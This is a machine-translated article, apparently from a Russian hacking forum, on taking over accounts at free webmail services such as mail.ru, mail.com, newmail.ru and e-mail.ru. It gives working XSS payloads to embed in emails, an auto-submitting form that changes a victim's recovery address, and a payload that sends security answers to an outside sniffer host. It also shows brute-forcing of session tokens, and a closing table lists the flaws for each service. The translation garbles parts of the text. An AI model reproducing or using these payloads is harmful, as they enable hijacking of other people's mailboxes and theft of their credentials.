This page has been robot translated, sorry for typos if any. Original content here.

EXAMEN DE VULNÉRABILITÉ DES SERVICES DE COURRIER POSTAUX GRATUITS

Nous continuons à faire du courrier Web. J'ai fait une petite recherche sur divers services de piratage informatique et vous ai présenté les résultats. La technologie d’attaque reste la même: une lettre contenant du code JavaScript est envoyée à une adresse différente, qui est déclenchée à l’ouverture de la lettre et modifie toutes les informations dans les paramètres de la boîte aux lettres de l’utilisateur. Cela n'a aucun sens de décrire chaque serveur en détail, étant donné que l'approche est la même partout. Je vais donc donner quelques exemples et, à la fin, un tableau. Dans la plupart des cas, le piratage informatique peut être considéré à 100%, avec certaines hypothèses: l’utilisateur doit absolument utiliser l’interface Web pour lire les lettres, lorsqu’il s’agit d’écrire des exploits, j’ai été guidé par une plate-forme standard, c’est-à-dire que je suppose au départ que l’utilisateur n’a Navigateur avec exécution JS désactivée.

WWW.MAIL.RU

Je commencerai par le courrier numéro 1 en Russie. Pour le moment, grâce au saut de JavaScript et à une erreur des développeurs, cette boîte peut être piratée. Je crois que les principes de base sont bien connus. Comment obtenir un mot de passe? 1 - changement non autorisé de celui-ci. En cas d'échec, vous devez connaître la version précédemment installée. 2 - changez la question secrète et utilisez le service de contrôle de l'amnésie. Cela ne fonctionnera pas non plus. 3 - Configurez votre adresse électronique alternative pour recevoir un nouveau mot de passe généré par le système. Cela ne fonctionnera pas, les deux dernières des options ci-dessus sont sous la même forme et sont également protégées par mot de passe. Même les autres paramètres qui nous intéressent le moins (nom, prénom, etc.) ne seront plus modifiés sans entrer le mot de passe actuel. Il semblerait qu'il n'y ait pas d'options. Cependant, il existe une section secondaire peu visible des paramètres "Contact" (ICQ, site Web, téléphone, lieu de travail, fuseau horaire, etc.). Vous pouvez également spécifier un email de contact dans cette section. L'astuce est que, dans ce cas, l'adresse alternative dans les informations d'enregistrement change, mais celle qui est écrite dans le questionnaire, et vous pouvez maintenant obtenir le mot de passe du feuillet via le service de rappel. Tout est simple URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Cependant, en utilisant la méthode GET, les paramètres ne peuvent plus être modifiés dans la boîte aux lettres mail.ru. Je vais donc décrire en détail le côté technique du problème.

I. Nous envoyons une lettre avec un code à la boîte aux lettres souhaitée, ce qui générera un cadre directement dans le corps du message avec un lien vers notre site Web. Si possible, le script doit être déclenché sans aucune intervention de l'utilisateur (clic, clic, survol, chargement d'images, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.votredomaine.ru/votcript.html> </ iframe>'; ceci.wav">
 <p id = 'xxx'>
Afin de garantir pleinement les performances du script, ainsi que le masquage, nous transformons:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.ru/votcript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
En tant que tels, les codes de caractères remplacent les lettres au nom des éléments javascript et iframe, et le script de messagerie ne les filtre pas. Etat de la ligne = emplacement; crée la visibilité de l'URL locale dans la barre d'état afin que les scintillements inutiles ne causent pas de suspicion. Les attributs width et height du cadre et de l'embed sont mis à zéro et les rendent invisibles.

II. Sur la ressource http://yoursite.ru, nous avons un document HTML avec le formulaire d’envoi des données modifiées au serveur mail.ru.

Le contenu de yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: Je garantis que le travail de la partie client du script reste inchangé uniquement pour IE; le formulaire d'envoi est posté sur un site séparé spécifiquement pour "décharger" la lettre.


WWW.MAIL.COM

Maintenant, une erreur de sécurité légèrement différente, par exemple http://mail.com. Si vous utilisez le service de rappel de mot de passe, pour l'obtenir, entrez simplement la réponse correcte à la question de sécurité (l'une des options). Nous nous sommes donc fixé la tâche d'obtenir cette réponse. Cela se fait facilement. Lorsque je suis allé dans les propriétés de la boîte aux lettres et que j'ai examiné les informations d'enregistrement, j'ai constaté que la réponse à la question secrète n'était pas masquée, ce qui nous permet de lire sa valeur à l'aide de JavaScript.

Nous implémentons le script via la balise de style .
Adresse de la page de paramètres: http://mail01.mail.com/scripts/common/genprofile.cgi
Nom du formulaire: profileform
Nom du champ de texte secret hint_a
Par conséquent, pour voler la question secrète, vous devez appeler la page des paramètres, démarrer JavaScript, obtenir la valeur document.profileform.hint_a.value et la transmettre au renifleur avec la variable d'environnement REQUEST_UR I.

Option Prêt:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zéro'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = chemin + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
Dans le cadre généré avec le nom zéro, la page des paramètres est chargée. À la fin du téléchargement, le gestionnaire OnLoad lance un script permettant de lire la question de sécurité, puis, via le même cadre, envoie une réponse au renifleur. Maintenant, allez simplement à http://zero.h12.ru/stat/log.php et trouvez les informations nécessaires dans la ligne "Host" .

WWW.NEWMAIL.RU

À mon avis, c’est un mailer très populaire, je vais donc en parler en détail. De plus, prendre possession du compte de quelqu'un d'autre est beaucoup plus facile qu'il n'y parait à première vue. Vous pouvez faire ceci: envoyer un email avec un script qui recevra un identifiant de session au démarrage, générer les demandes nécessaires et modifier les paramètres de l’autre email (qui sera ensuite envoyé au mot de passe) ainsi que la question secrète et sa réponse. Toutefois, si vous spécifiez une autre adresse lors du rappel, le mot de passe lui sera envoyé si seule la réponse secrète était correcte. Et l'observation suivante: un identifiant de session pour modifier les paramètres ne peut généralement PAS être utilisé. De plus, toutes les balises sont autorisées. Tout ce qui précède réduit la quantité de code à quelques lignes:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = REPONSE width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

La méthode de piratage e-mail.ru ne correspond pas un peu au sujet général de l'article, mais néanmoins - mail :) . Lorsque j’ai eu besoin d’obtenir le mot de passe d’une boîte, j’ai, comme d’habitude, créé un compte et commencé à faire des recherches sur le système. La première chose qui a attiré mon attention a été la possibilité de définir un nouveau mot de passe et une question secrète avec la réponse, sans entrer l'ancien mot de passe. Le plan d’action habituel: vérifier le filtrage des balises, obtenir l’ID et exécuter la demande. Toutefois, pour modifier les paramètres, une variable spéciale appelée utoken a été utilisée. Elle est contenue dans le corps du document. Après avoir expérimenté avec le changement de la question et répondre avec l'utoken précédemment connu:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ QUESTION & panswer = http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ J'étais venu Je conclus que l' identification et les cookies ne sont pas nécessaires pour modifier les paramètres. En même temps, après avoir observé utoken, il a été constaté que le nombre hexadécimal à quatre chiffres figurant après l'adresse électronique email@e-mail.ru-5a00 se situe dans une plage très étroite. À savoir, pour établir une question secrète avec une réponse sur toute case qui nous intéresse, vous devez trier 7 options seulement: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Lorsque le nombre est deviné, nous allons entrer dans la bonne case.

Notes: quelques changements ont eu lieu pour le moment. Le service de récupération de mot de passe ne fonctionne pas, il est donc conseillé de le changer immédiatement. L'adresse de changement de paramètre a également changé:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ La méthode ne fonctionne pas toujours. Probablement, il est néanmoins nécessaire que l'utilisateur se connecte occasionnellement via le Web .

Tableau présentant les caractéristiques des serveurs WWW gratuits

SERVEUR Javascript VULNÉRABILITÉ
www.km.ru
km.ru
img src = javascript: Vous permet de lire le mot de passe à partir de la page des paramètres à partir du champ mot de passe
www.mail.ru
inbox.ru , bk.ru , list.ru ,
intégrer src = javascript: Courriel alternatif peut être changé
www.mail.com
email.com , post.com , moi même , consultant.com , etc.
@ import url (javascript :); Les paramètres montrent la réponse à la question de sécurité
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
De toute façon Lire / modifier la question et la réponse. Mot de passe délivré valide
www.netman.ru et www.mailgate.ru
le même mailer. environ 80 domaines
img src = javascript :, style = background: url (javascript :) Vous pouvez voler la réponse à votre question de sécurité, si celle-ci est définie. Il est également possible de définir l'adresse pour le transfert (les copies ne sont pas sauvegardées)
www.yandex.ru OnError, OnLoad Suppression du site * .narod.ru (JS n'est pas requis)
www.ukr.net intégrer src = javasc
ript: ce .wav>
Lisez la réponse à la question de sécurité.
www.nextmail.ru
xaker.ru , email.su , russian.ru , étudiants.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Changer / voler la réponse à la question de sécurité
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , etc.
À bien des égards Suppression de compte
www.rin.ru intégrer src = javascript: Lire la réponse secrète